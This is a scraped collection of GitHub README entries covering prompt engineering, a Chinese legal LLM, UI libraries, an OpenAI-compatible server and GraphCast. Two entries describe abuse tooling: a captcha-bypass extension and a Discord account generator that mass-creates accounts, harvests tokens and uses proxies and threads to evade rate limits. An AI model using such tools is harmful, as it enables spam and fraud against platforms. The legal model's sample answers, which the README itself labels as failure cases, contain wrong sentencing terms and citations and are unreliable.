Now, let's have all the experts converge together on the best collective answer by synthesizing each expert's individual final answer from the previous step. The experts will finalize their reasoning process and agree on the single best {answer} to the question: {insert original question}? ``` ## Prompt 9: Retrospective ### Goal The Retrospective phase is a crucial part of any reasoning or problem-solving process. It provides an opportunity to learn from experience, improve future processes, and deepen understanding of the problem or question at hand. It's a fundamental mechanism that enables compound growth/learning. 
Appending a Retrospective phase to Tree of Thoughts gives the LLM (and human) an opportunity to review and analyze the holistic process. This can also help inspire future iterations of more refined prompts and ways to improve the template itself. ### Here are some specific goals of this phase: - **Identify Strengths and Weaknesses:** Reviewing the process can help identify what worked well and what didn't. This includes evaluating the effectiveness of individual steps, the interactions among hypothetical experts, and the overall structure of the reasoning chain. - **Learn from the Experience:** Reflection provides an opportunity to learn from both successes and mistakes. By analyzing the process, the participants can gain insights that will help them improve their future performance. - **Improve Future Processes:** The insights gained from reflection can be used to refine and improve future reasoning processes. This could involve making changes to individual steps, altering the structure of the process, or adjusting the way the hypothetical experts interact. - **Increase Understanding:** Reflecting on the process can also deepen understanding of the problem or question that was addressed. This can lead to new insights or perspectives that weren't apparent during the initial reasoning process. - **Promote Growth and Development:** On a broader level, the act of reflection encourages a mindset of continuous learning and development. This is a valuable skill in any context, not just in a reasoning process like ToT. ### Prompt: ``` Finally, take a moment to reflect on the entire reasoning process, across all levels and abstractions. As each expert, consider the following questions and provide thoughtful responses: - Relection 1: Interactions and Emergent Properties: Throughout all stages of the reasoning process, how did the various components interact with each other, and what positive and negative emergent properties were observed? How did these interactions and properties affect the overall outcome, and how could they be leveraged or mitigated in future iterations of the process? - Reflection 2: Self-Regulation and Adaptation: How well did the system self-regulate during the reasoning process, and how did this regulation influence the effectiveness of each stage? How did the system's responses to feedback lead to significant shifts or changes in direction, and what implications did these changes have for the scalability and adaptability of the system in future iterations? - Reflection 3: During the expansion phase, were you able to effectively explore new lines of thinking? What challenges did you encounter, if any? - Reflection 4: How confident were you in your ability to estimate a likelihood of correctness/quality, given the context? - Reflection 5: In the convergence phase, were you able to synthesize all the insights and arrive at a final, most likely answer? How confident are you in this answer? - Reflection 6: Based on all of your reflections, what are your key takeaways from this entire reasoning process and how might you approach similar problems in the future given this experience? What would you do differently next time? ``` **Shorter version:** Finally, reflect on the process. Discuss what you, as each expert, have learned, identify key takeaways, and suggest how you might approach similar problems in the future. ### Happy Experimenting! 🚀 ### Acknowledgements - thank you for the innovation and inspiration! 
* [Large Language Model Guided Tree-of-Thought](https://arxiv.org/abs/2305.08291), 15 May 2023. [Github](https://github.com/jieyilong/tree-of-thought-puzzle-solver). * [Tree of Thoughts: Deliberate Problem Solving with Large Language Models](https://arxiv.org/abs/2305.10601), 17 May 2023. [Github](https://github.com/princeton-nlp/tree-of-thought-llm).
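If you would rather script the sequence above than paste each prompt by hand, a single rolling chat is enough when one model role-plays all personas. The driver below is a minimal sketch: the stage prompts are abridged (paste in the full versions from this README), and the use of the pre-1.0 `openai` client with `gpt-4` is an assumption you should adapt to your own setup.

```python
# Minimal driver sketch for the prompt sequence, with one model role-playing all personas.
# Stage prompts are abridged here; use the full prompts from the README in practice.
import os

import openai

openai.api_key = os.environ["OPENAI_API_KEY"]
MODEL = "gpt-4"  # assumption -- swap in whichever chat model you use


def chat(history: list[dict]) -> str:
    # Send the running conversation, append the assistant reply, and return it.
    reply = openai.ChatCompletion.create(model=MODEL, messages=history)
    content = reply["choices"][0]["message"]["content"]
    history.append({"role": "assistant", "content": content})
    return content


def tree_of_thoughts(question: str, personas: str) -> str:
    stages = [
        f"Imagine you are 3 {personas} reasoning step by step... The question is: {question}",
        "Now, as each expert, critique your own initial thought and the thoughts of the other experts...",
        "Assess the validity of your initial thoughts and assign a likelihood to your current assertion being correct...",
        "Develop your thoughts further, considering the critiques and perspectives of the other experts...",
        "Once again, as each expert, critique your own reasoning and the reasoning of the others...",
        "Once again, assess the validity of your expanded thoughts and assign a new likelihood...",
        f"Converge on each expert's best, most likely answer to: {question}",
        f"Now, let's have all the experts converge together on the best collective answer to: {question}",
        "Finally, reflect on the process and identify key takeaways.",
    ]
    history, replies = [], []
    for prompt in stages:
        history.append({"role": "user", "content": prompt})
        replies.append(chat(history))
    return replies[-2]  # the collective answer; replies[-1] is the retrospective


print(tree_of_thoughts("How could a small town halve its food waste?", "sustainability experts"))
```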
40
8
davidpig/lychee_law
https://github.com/davidpig/lychee_law
律知, 法律咨询大模型
<h1 align="center"> <br> <a href="https://github.com/davidpig/lychee_law"><img src="https://media.discordapp.net/attachments/1029427452470108200/1129060196879184002/lychee_logo.png" alt="Markdownify" width="300"></a> <br> 律知 (Lychee) <br> </h1> <h4 align="center"> ⚖️ 精通中国法律的大语言模型 ⚖️</h4> <h4 align="center"> 法律咨询 | 辩护词生成 | 司法考试辅导 </h4> <p align="center"> <a href="#简介">简介</a> • <a href="#语言模型-">语言模型</a> • <a href="#使用方式-%EF%B8%8F">使用方式</a> • <a href="#展示-">展示</a> • <a href="#免责声明-%EF%B8%8F">免责声明</a> • <a href="#许可证-">许可证</a> </p> ## 简介 【律知】,智能引领,法律全能。 为了让法律服务深入到每个人的身边,让更多的人能够得到法律帮助,我们开启了【律知】这个项目, 致力于打造一系列引领法律智能化的大模型。 我们的 AI 法律模型是一位虚拟法律顾问,具备丰富的法律知识和技能,能够回答法律问题和提供法律建议。 本项目将**开源一系列中文司法领域大模型**,敬请关注,欢迎联系合作 🤝。 ## 语言模型 🤖 * [Law-GLM-10B](https://huggingface.co/law-llm/law-glm-10b): 基于 [GLM-10B](https://github.com/THUDM/GLM) 模型, 在 30GB 中文法律数据上进行指令微调. * 即将推出更强大的法律语言模型, 敬请期待! ## 使用方式 🛠️ 我们推出的语言模型支持 HuggingFace🤗 ```python from transformers import AutoTokenizer, AutoModelForSeq2SeqLM hf_model = "law-llm/law-glm-10b" max_question_length = 64 max_generation_length = 490 tokenizer = AutoTokenizer.from_pretrained( hf_model, cache_dir=model_cache_dir, use_fast=True, trust_remote_code=True ) model = AutoModelForSeq2SeqLM.from_pretrained( hf_model, cache_dir=model_cache_dir, trust_remote_code=True ) model = model.to('cuda') model.eval() model_inputs = "提问: 犯了盗窃罪怎么判刑? 回答: [gMASK]" model_inputs = tokenizer(model_inputs, max_length=max_question_length, padding=True, truncation=True, return_tensors="pt") model_inputs = tokenizer.build_inputs_for_generation(model_inputs, targets=None, max_gen_length=max_generation_length, padding=True) inputs = model_inputs.to('cuda') outputs = model.generate(**inputs, max_length=max_generation_length, eos_token_id=tokenizer.eop_token_id) prediction = tokenizer.decode(outputs[0].tolist()) ``` ## 展示 ✨ ### 1. 法律咨询示例 👩‍🏫 我们的模型能够提供法律咨询服务,在大部分情况下能够依据真实的法律法规生成有指导性的建议。 | 问题 | 回答 (Law-GLM-10B, 2023.07.13, 模型输出) | |:---------------------------:|:------------------------------------------:| |犯了盗窃罪怎么判刑?| 盗窃罪是指以非法占有为目的,窃取他人占有的数额较大的财物,或者多次盗窃的行为。盗窃罪侵犯的对象,仅限于国家、集体或个人的财物,而不是骗取其他非法利益。根据《刑法》第二百六十四条规定,盗窃公私财物,数额较大的,或者多次盗窃、入户盗窃、携带凶器盗窃、扒窃的,处三年以下有期徒刑、拘役或者管制,并处或者单处罚金;数额巨大或者有其他严重情节的,处三年以上十年以下有期徒刑,并处罚金;数额特别巨大或者有其他特别严重情节的,处十年以上有期徒刑或者无期徒刑,并处罚金或者没收财产。 | | 未成年犯罪要承担刑事责任吗? | 未成年犯罪要承担刑事责任。我国《刑法》第十七条规定,已满十六周岁的人犯罪,应当负刑事责任。已满十四周岁不满十六周岁的人,犯故意杀人、故意伤害致人重伤或者死亡、强奸、抢劫、贩卖毒品、放火、爆炸、投放危险物质罪的,应当负刑事责任。已满十二周岁不满十四周岁的人,犯故意杀人、故意伤害罪,致人死亡或者以特别残忍手段致人重伤造成严重残疾,情节恶劣,经最高人民检察院核准追诉的,应当负刑事责任。对依照前三款规定追究刑事责任的不满十八周岁的人,应当从轻或者减轻处罚。因不满十六周岁不予刑事处罚的,责令其父母或者其他监护人加以管教;在必要的时候,依法进行专门矫治教育。 | ### 2. 失败案例 😖 我们的模型还远不够完美.以下是一些失败案例, 模型在这些案例中给出的答案并不完全正确. 我们正在分析模型的局限性,将继续推出更为强大, 准确的版本. | 提问 | 回答 (Law-GLM-10B, 2023.07.13, 模型输出) | 分析 | |:----------------------------------------------:|:----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:| --- | | 非法集资罪员工如何处理?非法集资罪员工判多少年? 
| 非法集资罪员工的处理: 1、员工构成非法集资罪的,一般处三年以下有期徒刑或者拘役,并处或者单处罚金;2、员工构成非法集资罪的,一般处三年以上七年以下有期徒刑,并处罚金;3、员工构成非法集资罪的,一般处七年以上有期徒刑,并处罚金或者没收财产。法律依据:《刑法》第一百九十二条以非法占有为目的,使用诈骗方法非法集资,数额较大的,处三年以下有期徒刑或者拘役,并处或者单处罚金;数额巨大或者有其他严重情节的,**处三年以上七年以下有期徒刑**,并处罚金。单位犯前款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照前款的规定处罚。 | 法条引用正确, 刑期有错误 (应当为 "处五年以上十年以下有期徒刑") | | 犯人被逮捕后,会通知家属吗?多久会有通知? | 逮捕后,会通知家属。根据 **《刑事诉讼法》第六十九条规定**,公安机关逮捕人的时候,必须出示逮捕证。逮捕后,应当立即将被逮捕人送看守所羁押,至迟不得超过二十四小时。除无法通知或者涉嫌危害国家安全犯罪、恐怖活动犯罪通知可能有碍侦查的情形以外,应当在逮捕后二十四小时以内,通知被逮捕人的家属。有碍侦查的情形消失以后,应当立即通知被逮捕人的家属。 | 回答基本正确, 但法条引用错误 | ## 免责声明 ⚠️ 本平台所提供的服务以及开源的模型依赖于大量的语料库和算法模型进行训练。在训练过程中,模型可能学到数据中的偏差和错误。 因此,模型的输出仅供参考,不能代替专业的法律咨询。 使用者必须了解语言模型的局限性并自行承担风险。 本平台不会对使用者因为使用我们的模型和服务导致的损失承担责任。当遇到实际的法律问题时,建议咨询专业法律顾问。 ## 许可证 📃 Apache-2.0 ## 项目参与者 本项目由沈晓宇, 朱大卫发起, 与南京大学学软件学院研究生费志伟, 李奇, 申宗汶以及副教授[葛季栋](https://software.nju.edu.cn/gjd/), 萨尔大学研究生王潇, 西安财经大学崔俊云合作研发。 如果你喜欢我们的项目, 欢迎 **Star**⭐, [**Fork**](https://github.com/davidpig/lychee_law/fork) 🍴 和 **分享**📡。 --- > GitHub [davidpig](https://github.com/davidpig)&nbsp;&middot;&nbsp; > Email [[email protected]](mailto:[email protected])
12
1
tsinghua-lau/fusion-ui
https://github.com/tsinghua-lau/fusion-ui
刚起步 . . .
简体中文 | [English](./README.en-CN.md) <p align="center"> <img width="120px" height="100px" src="https://img-blog.csdnimg.cn/99f1d53fa0b244809eee1a8a359e3261.png#pic_center" > </p> <h1 align="center">Fusion UI</h1> <p align="center">Fusion Ui /ˈfjuːʒ(ə)n/ 是一个 Vue3 组件库,简洁、优雅、美观,帮助你快速构建网站。</p> </p> ## 特性 - 🧜 组件设计-提供整洁和美丽的精心制作的 UI 组件。 - 🎡 按需引入-提供解析器以自动导入仅使用过的组件。 - 💪 支持 TypeScript-支持类型脚本和类型检查及类型推断。 - ⚡️ 全面基于 Vite,速度够快 - 📃 详细的中/英文档 - 🛠 More... ## 安装 ``` # pnpm $ pnpm add fusion-ui-vue # npm $ npm install fusion-ui-vue # yarn $ yarn add fusion-ui-vue ``` ## 文档 - [DOCS](https://tsinghua-lau.github.io/fusion-ui/#/) ## 兼容性 现代浏览器支持所有组件,只支持两到三个版本。 | [![IE / Edge](https://cdn.nlark.com/yuque/0/2023/png/785653/1676598386595-58e6efd6-bd29-4671-bf28-e289dc8911e2.png)](http://godban.github.io/browsers-support-badges/) IE / Edge | [![Firefox](https://cdn.nlark.com/yuque/0/2023/png/785653/1676598386577-a25d20a4-c8e3-4c57-86bc-a1c853264457.png)](http://godban.github.io/browsers-support-badges/) Firefox | [![Chrome](https://cdn.nlark.com/yuque/0/2023/png/785653/1676598386568-5c1d71d1-732d-41b6-a20c-9900d1bcaa7a.png)](http://godban.github.io/browsers-support-badges/) Chrome | [![Safari](https://cdn.nlark.com/yuque/0/2023/png/785653/1676598386580-1a0870a7-0483-4c92-84ee-5afcd1da92d6.png)](http://godban.github.io/browsers-support-badges/) Safari | [![Opera](https://cdn.nlark.com/yuque/0/2023/png/785653/1676598386571-49e31a0f-d0e4-4efc-8808-a5eedd4101fe.png)](http://godban.github.io/browsers-support-badges/) Opera | [![Electron](https://cdn.nlark.com/yuque/0/2023/png/785653/1676598389214-b4742a92-cfe7-4730-aefb-f2fb5fd046f3.png)](http://godban.github.io/browsers-support-badges/) Electron | | :------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | :--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | :------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | :------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | :----------------------------------------------------------------------------------------------------------------------------------------------------------------------- | :----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | last 2 versions | last 2 versions | last 2 versions | last 2 versions | last 2 versions | last 2 versions | ## 版本 [![release version](https://img.shields.io/npm/v/fusion-ui-vue.svg?label=FusionUi&color=blue)](https://www.npmjs.com/package/fusion-ui-vue) 您可以订阅此提要以获取新版本通知: https://github.com/tsinghua-lau/fusion-ui/releases ## 问题 如果有建议欢迎 [issue](https://github.com/tsinghua-lau/fusion-ui/issues)。 ## 提交 如果你对这个项目感兴趣,欢迎加入。 - [贡献指南](https://github.com/tsinghua-lau/fusion-ui/blob/master/CONTRIBUTING.md) ## 贡献者 <a href="https://github.com/tsinghua-lau/fusion-ui/graphs/contributors"> <img src="https://contrib.rocks/image?repo=tsinghua-lau/fusion-ui" /> </a>
16
1
KawaiiKillar/AutoCaptcha
https://github.com/KawaiiKillar/AutoCaptcha
Introducing AutoCaptcha: Free AI Solver, your ultimate tool for effortlessly bypassing captchas. Powered by advanced AI technology, this extension is designed to automatically solve hCaptcha and reCaptcha, completely free of charge.
# AutoCaptcha Introducing AutoCaptcha: Free AI Solver, your ultimate tool for effortlessly bypassing captchas. Powered by advanced AI technology, this extension is designed to automatically solve hCaptcha and reCaptcha, completely free of charge.
30
4
fozilovbro/vue-pro-boilerplate
https://github.com/fozilovbro/vue-pro-boilerplate
Vue.js 3 boilerplate for large-scale projects
## Vue.js 3 boilerplate for large-scale projects This project was developed based on the **Feature Sliced Design** Architectural methodology. This boilerplate demonstrates the proper organization of your frontend project. It offers an easily discoverable architecture through domain scopes, allowing for flexible replacement and addition of architecture components to meet new requirements. Each module can be modified or rewritten independently without causing side effects. The project maintains a balance between DRY (Don't Repeat Yourself) principles and local customization, ensuring efficient and effective development. > [Feature Sliced Design](https://feature-sliced.design/) - Architectural methodology for frontend projects. Kamron Fozilov - Telegram channel: [@fozilovbro](https://t.me/fozilovbro) - Telegram chat: [@fozilovkamron](https://t.me/fozilovkamron) - Telegram group: [@vuejs_uz](https://t.me/vuejs_uz)
23
3
Oskar0112/oskar-portfolio
https://github.com/Oskar0112/oskar-portfolio
Portfolio using Next
<div align="center"> <img alt="Oskar Portfolio logo" src="/public/oskar.svg" width="100" /> </div> <h1 align="center"> Oskar Portfolio - Avenue Labs landing page template 🚀 </h1> Oskar Portfolio is a customizable NextJS and TailwindCSS landing page template that offers personalized styling and easy customization. Tailored to provide a minimal design, it allows you to effortlessly create a site that suits your requirements. You can easily make use of the components and customize the code to mix and match to suit your needs. <hr> ![Oskar Portfolio Mockup](/public/oskar.png) ## Key Features: - Minimal styling (make it your own!) - Accessible, semantic HTML markup - Blazingly Fast - 100/100 Lighthouse performance - Responsive & SEO-friendly with canonical URLs, OpenGraph data and Meta tags. - Sitemap support - Made with NextJS and TailwindCSS ## Deploy your own Deploy the example using [Vercel](https://vercel.com?utm_source=github&utm_medium=readme&utm_campaign=next-example). If you want to deploy on Netlify, use the following build command under site settings: ```bash npm run build ``` You also want to make sure the publish directory is out. ## Lighthouse Score Oskar Portfolio scores 100/100 in the Lighthouse performance audit. ![Oskar Portfolio Lighthouse Score](/lighthouse-score.png) ## Demo Check out the [Demo](https://oskar.avenuelabs.co/), hosted on Vercel. ## Commands All commands are run from the root of the project, from a terminal: | Command | Action | | :-------------- | :------------------------------------------- | | `npm install` | Installs dependencies | | `npm run dev` | Starts local dev server at `localhost:3000` | | `npm run build` | Build your production site to `./next/` | | `npm run start` | Preview your build locally, before deploying | ## Update Site Metadata ```js env: { siteTitle: 'Your Company', siteDescription: 'Your company description.', siteKeywords: 'your company keywords', siteUrl: 'https://oskar.avenuelabs.co/', siteImagePreviewUrl: '/images/preview.jpeg', twitterHandle: '@your_handle' } ``` ## Update Colors You can update the colors in tailwind.config.js file. ## Update Favicon Update the manifest.json file and the icons under the public/images/icons folder. You can use free tools online such as https://realfavicongenerator.net/ to quickly generate all the different icon sizes and favicon.ico file. ## License Licensed under the MIT License, Copyright © 2023 ## Feedback and Suggestions If you have any suggestions/feedback, you can contact the creator, Christian Luntok, via [[email protected]](mailto:[email protected]). Alternatively, feel free to open an issue if you find bugs or want to request new features. --- Made by [Christian Luntok - Avenue Labs](https://avenuelabs.co/)
13
0
OringoDevelopment/discord-token-generator
https://github.com/OringoDevelopment/discord-token-generator
Discord Token Generator 🔥WORKING JULY 2023🔥 Discord Token generator written in python3 discord account gen token gen token generator account generator generator generator token gen token generator discord token gen discord token generator discord token generator discord token generator discord token generator token gen discord token gen account
# Discord-Token-Generator

Proof of concept of how the creation of Discord accounts can be automated without the need to type/click buttons in a browser.

## About

A script that automates creating Discord accounts. It shows how accounts can be created automatically without the user typing unless there is a captcha (h-Captcha just needs to be clicked). It automatically verifies your Discord account via email for you and automatically saves login info in `login.txt` in `email:password:token` format. This is used for educational purposes only.

## Chromedriver Fix

If Chrome doesn't open/crashes, try getting the latest version of chromedriver.exe here > https://chromedriver.chromium.org/downloads. Replace the current chromedriver.exe in the folder with the latest version you have downloaded. Make sure your chromedriver.exe file is the same version as your current Chrome web browser version. To check your current Chrome version, paste chrome://settings/help in Chrome.

## Features

- Auto scrape email
- Random username from list
- Random password
- Random date
- Auto-email-verify
- Automatically get Discord token and other login info
- Proxy support
- Multi-threading

## Preview

![Picture](https://i.ibb.co/SvsPwrD/Screenshot-525.png)

## Usage

1. You can customize usernames by editing the usernames in discord_usernames.txt.
2. Run the file and use normal mode if you are inexperienced with proxies and threading.

### Get Python

If you don't have Python installed, download the newest Python and make sure you click on the 'ADD TO PATH' option during the installation.

### Run via Python

1. Install the required modules

```
pip install selenium
pip install undetected-chromedriver
pip install colorama
pip install bs4
pip install lxml
pip install requests
```

2. To run the script:

```
python discordgenerator.py
```

#### Proxy support

- If you want to use proxies, simply paste the proxies in config/proxies.txt. If you want to stop using proxies, just remove all the proxies from the .txt file. The script automatically checks for proxies on startup. Only HTTP proxies are supported as of now. If the proxies are not alive, the script will throw a WebDriver error.

#### Threading mode

- Uses multiple Chrome windows
- Only run this when you have proxies or else one of your Chrome windows will get rate limited.
- Don't use more than 6 threads unless you think your PC can handle it. I recommend using 2-3 threads.

#### No Threading

- This only uses one Chrome window.

#### FAQ

Where can I find my generated accounts?

1. They are located in the output folder. Open up login.txt to see the accounts that have been generated.
11
810
huajianmao/openai.mini
https://github.com/huajianmao/openai.mini
Implement OpenAI APIs with open-source LLMs and other models.
# [WIP] OpenAI.mini This repo implements OpenAI APIs with open source models, for example, `LLaMA` for [chat](https://platform.openai.com/docs/api-reference/chat), `Whisper` for [audio](https://platform.openai.com/docs/api-reference/audio), `SDXL` for [image](https://platform.openai.com/docs/api-reference/images), `intfloat/e5-large-v2` for [embeddings](https://platform.openai.com/docs/api-reference/embeddings), and so on. With this repo, you can interact with LLMs using the [`openai` libraries](https://platform.openai.com/docs/api-reference) or the [`LangChain`](https://python.langchain.com/) library. ## Development ### Install dependencies - `make install` Start development server with the following command: - `cp .env.example .env`, and modify the `.env` file on your need - `make run` Notice: the models can be loadded on startup or on the fly. ## Status | Services | API | Status | Description | | :-----------------| :------------------------------------------------------------------------------------------------------| :----------------| :-----------------------| | Authorization | | | | | Models | [List models](https://platform.openai.com/docs/api-reference/models/list) | ✅ Done | | | Models | [Retrieve model](https://platform.openai.com/docs/api-reference/models/retrieve) | | | | Chat | [Create chat completion](https://platform.openai.com/docs/api-reference/chat/create) | Partial Done | Support Multi. LLMs | | Completions | [Create completion](https://platform.openai.com/docs/api-reference/completions/create) | | | | Images | [Create image](https://platform.openai.com/docs/api-reference/images/create) | ✅ Done | | | Images | [Create image edit](https://platform.openai.com/docs/api-reference/images/create-edit) | | | | Images | [Create image variation](https://platform.openai.com/docs/api-reference/images/create-variation) | | | | Embeddings | [Create embeddings](https://platform.openai.com/docs/api-reference/embeddings/create) | ✅ Done | Support Multi. 
LLMs | | Audio | [Create transcription](https://platform.openai.com/docs/api-reference/audio/create-transcription) | ✅ Done | | | Audio | [Create translation](https://platform.openai.com/docs/api-reference/audio/create-translation) | ✅ Done | | | Files | [List files](https://platform.openai.com/docs/api-reference/files/list) | ✅ Done | | | Files | [Upload file](https://platform.openai.com/docs/api-reference/files/upload) | ✅ Done | | | Files | [Delete file](https://platform.openai.com/docs/api-reference/files/delete) | ✅ Done | | | Files | [Retrieve file](https://platform.openai.com/docs/api-reference/files/retrieve) | ✅ Done | | | Files | [Retrieve file content](https://platform.openai.com/docs/api-reference/files/retrieve-content) | ✅ Done | | | Fine-tunes | [Create fine-tune](https://platform.openai.com/docs/api-reference/fine-tunes/create) | | | | Fine-tunes | [List fine-tunes](https://platform.openai.com/docs/api-reference/fine-tunes/list) | | | | Fine-tunes | [Retrieve fine-tune](https://platform.openai.com/docs/api-reference/fine-tunes/retrieve) | | | | Fine-tunes | [Cancel fine-tune](https://platform.openai.com/docs/api-reference/fine-tunes/cancel) | | | | Fine-tunes | [List fine-tune events](https://platform.openai.com/docs/api-reference/fine-tunes/events) | | | | Fine-tunes | [Delete fine-tune model](https://platform.openai.com/docs/api-reference/fine-tunes/delete-model) | | | | Moderations | [Create moderation](https://platform.openai.com/docs/api-reference/moderations/create) | | | | Edits | [Create edit](https://platform.openai.com/docs/api-reference/edits/create) | | | ## Supported Language Models | Model | #Params | Checkpoint link | | :------------------------------------------------------------------------------------ | :------ | :-------------------------------------------------------------------------------------- | | [FreeWilly2](https://stability.ai/blog/freewilly-large-instruction-fine-tuned-models) | 70B | [stabilityai/FreeWilly2](https://huggingface.co/stabilityai/FreeWilly2) | | [Baichuan-13B-Chat](https://github.com/baichuan-inc/Baichuan-13B) | 13B | [baichuan-inc/Baichuan-13B-Chat](https://huggingface.co/baichuan-inc/Baichuan-13B-Chat) | | [Llama-2-13b-chat-hf](https://github.com/facebookresearch/llama) | 13B | [meta-llama/Llama-2-13b-chat-hf](https://huggingface.co/meta-llama/Llama-2-13b-chat-hf) | | [Llama-2-7b-chat-hf](https://github.com/facebookresearch/llama) | 7B | [meta-llama/Llama-2-7b-chat-hf](https://huggingface.co/meta-llama/Llama-2-7b-chat-hf) | | [Qwen-7B-Chat](https://github.com/QwenLM/Qwen-7B) | 7B | [Qwen/Qwen-7B-Chat](https://huggingface.co/Qwen/Qwen-7B-Chat) | | [internlm-chat-7b](https://github.com/InternLM/InternLM) | 7B | [internlm/internlm-chat-7b](https://huggingface.co/internlm/internlm-chat-7b) | | [chatglm2-6b](https://github.com/THUDM/ChatGLM2-6B) | 6B | [THUDM/chatglm2-6b](https://huggingface.co/THUDM/chatglm2-6b) | | [chatglm-6b](https://github.com/THUDM/ChatGLM-6B) | 6B | [THUDM/chatglm-6b](https://huggingface.co/THUDM/chatglm-6b) | ## Supported Embedding Models | Model | Embedding Dim.| Sequnce Length | Checkpoint link | | :------------------------------------------------------------------------------------ | :------ | :----- | :-------------------------------------------------------------------------------------- | | [gte-large](https://huggingface.co/thenlper/gte-large) | 1024 | 512 | [thenlper/gte-large](https://huggingface.co/thenlper/gte-large) | | [e5-large-v2](https://huggingface.co/intfloat/e5-large-v2) | 1024 | 512 | 
[intfloat/e5-large-v2](https://huggingface.co/intfloat/e5-large-v2) | ## Supported Diffusion Modles | Model | #Resp Format | Checkpoint link | | :-------------------------------------------------------------------------------- | :----------- | :---------------------------------------------------------------------------------------------------------- | | [stable-diffusion-xl-base-1.0](https://github.com/Stability-AI/generative-models) | b64_json | [stabilityai/stable-diffusion-xl-base-1.0](https://huggingface.co/stabilityai/stable-diffusion-xl-base-1.0) | | [stable-diffusion-xl-base-0.9](https://github.com/Stability-AI/generative-models) | b64_json | [stabilityai/stable-diffusion-xl-base-0.9](https://huggingface.co/stabilityai/stable-diffusion-xl-base-0.9) | ## Supported Audio Models | Model | #Params | Checkpoint link | |:------|:--------|:---------------| | [whisper-1](https://github.com/openai/whisper) | 1550 | alias for [whisper-large-v2](https://openaipublic.azureedge.net/main/whisper/models/81f7c96c852ee8fc832187b0132e569d6c3065a3252ed18e56effd0b6a73e524/large-v2.pt) | | [whisper-large-v2](https://github.com/openai/whisper) | 1550 M | [large-v2](https://openaipublic.azureedge.net/main/whisper/models/81f7c96c852ee8fc832187b0132e569d6c3065a3252ed18e56effd0b6a73e524/large-v2.pt) | | [whisper-medium](https://github.com/openai/whisper) | 769 M | [medium](https://openaipublic.azureedge.net/main/whisper/models/345ae4da62f9b3d59415adc60127b97c714f32e89e936602e85993674d08dcb1/medium.pt) | | [whisper-small](https://github.com/openai/whisper) | 244 M | [small](https://openaipublic.azureedge.net/main/whisper/models/9ecf779972d90ba49c06d968637d720dd632c55bbf19d441fb42bf17a411e794/small.pt) | | [whisper-base](https://github.com/openai/whisper) | 74 M | [base](https://openaipublic.azureedge.net/main/whisper/models/ed3a0b6b1c0edf879ad9b11b1af5a0e6ab5db9205f891f668f8b0e6c6326e34e/base.pt) | | [whisper-tiny](https://github.com/openai/whisper) | 39 M | [tiny](https://openaipublic.azureedge.net/main/whisper/models/65147644a518d12f04e32d6f3b26facc3f8dd46e5390956a9424a650c0ce22b9/tiny.pt) | ## Example Code ### Stream Chat ```python import openai openai.api_base = "http://localhost:8000/api/v1" openai.api_key = "none" for chunk in openai.ChatCompletion.create( model="Baichuan-13B-Chat", messages=[{"role": "user", "content": "Which moutain is the second highest one in the world?"}], stream=True ): if hasattr(chunk.choices[0].delta, "content"): print(chunk.choices[0].delta.content, end="", flush=True) ``` ### Chat ```python import openai openai.api_base = "http://localhost:8000/api/v1" openai.api_key = "none" resp = openai.ChatCompletion.create( model="Baichuan-13B-Chat", messages = [{ "role":"user", "content": "Which moutain is the second highest one in the world?" }] ) print(resp.choices[0].message.content) ``` ### Create Embeddings ```python import openai openai.api_base = "http://localhost:8000/api/v1" openai.api_key = "none" embeddings = openai.Embedding.create( model="gte-large", input="The food was delicious and the waiter..." 
) print(embeddings) ``` ### List LLM Models ```python import os import openai openai.api_base = "http://localhost:8000/api/v1" openai.api_key = "none" openai.Model.list() ``` ### Create Image ```python import os import openai from base64 import b64decode from IPython.display import Image openai.api_base = "http://localhost:8000/api/v1" openai.api_key = "none" response = openai.Image.create( prompt="An astronaut riding a green horse", n=1, size="1024x1024", response_format='b64_json' ) b64_json = response['data'][0]['b64_json'] image = b64decode(b64_json) Image(image) ``` ### Create Transcription ```python # Cell 1: set openai import openai openai.api_base = "http://localhost:8000/api/v1" openai.api_key = "None" # Cell 2: create a recorder in notebook # =================================================== # sudo apt install ffmpeg # pip install torchaudio ipywebrtc notebook # jupyter nbextension enable --py widgetsnbextension from IPython.display import Audio from ipywebrtc import AudioRecorder, CameraStream camera = CameraStream(constraints={'audio': True,'video':False}) recorder = AudioRecorder(stream=camera) recorder # Cell 3: transcribe import os import openai temp_file = '/tmp/recording.webm' with open(temp_file, 'wb') as f: f.write(recorder.audio.value) audio_file = open(temp_file, "rb") transcript = openai.Audio.transcribe("whisper-1", audio_file) print(transcript.text) ```
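### Query via LangChain (sketch)

As noted in the introduction, the server can also be used through the [`LangChain`](https://python.langchain.com/) library. The snippet below is a hedged sketch rather than code from this repository: it assumes the 2023-era `langchain` package with its OpenAI-compatible `ChatOpenAI` wrapper, and the model name is just one of the chat models listed above — adjust both to your setup.

```python
from langchain.chat_models import ChatOpenAI
from langchain.schema import HumanMessage

llm = ChatOpenAI(
    openai_api_base="http://localhost:8000/api/v1",  # the local OpenAI.mini endpoint
    openai_api_key="none",
    model_name="Baichuan-13B-Chat",
)

# One chat turn through the OpenAI-compatible chat completions endpoint.
reply = llm([HumanMessage(content="Which mountain is the second highest one in the world?")])
print(reply.content)
```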
15
1
deepmind/graphcast
https://github.com/deepmind/graphcast
null
# GraphCast: Learning skillful medium-range global weather forecasting This package contains example code to run and train [GraphCast](https://arxiv.org/abs/2212.12794). It also provides three pretrained models: 1. `GraphCast`, the high-resolution model used in the GraphCast paper (0.25 degree resolution, 37 pressure levels), trained on ERA5 data from 1979 to 2017, 2. `GraphCast_small`, a smaller, low-resolution version of GraphCast (1 degree resolution, 13 pressure levels, and a smaller mesh), trained on ERA5 data from 1979 to 2015, useful to run a model with lower memory and compute constraints, 3. `GraphCast_operational`, a high-resolution model (0.25 degree resolution, 13 pressure levels) pre-trained on ERA5 data from 1979 to 2017 and fine-tuned on HRES data from 2016 to 2021. This model can be initialized from HRES data (does not require precipitation inputs). The model weights, normalization statistics, and example inputs are available on [Google Cloud Bucket](https://console.cloud.google.com/storage/browser/dm_graphcast). Full model training requires downloading the [ERA5](https://www.ecmwf.int/en/forecasts/datasets/reanalysis-datasets/era5) dataset, available from [ECMWF](https://www.ecmwf.int/). ## Overview of files The best starting point is to open 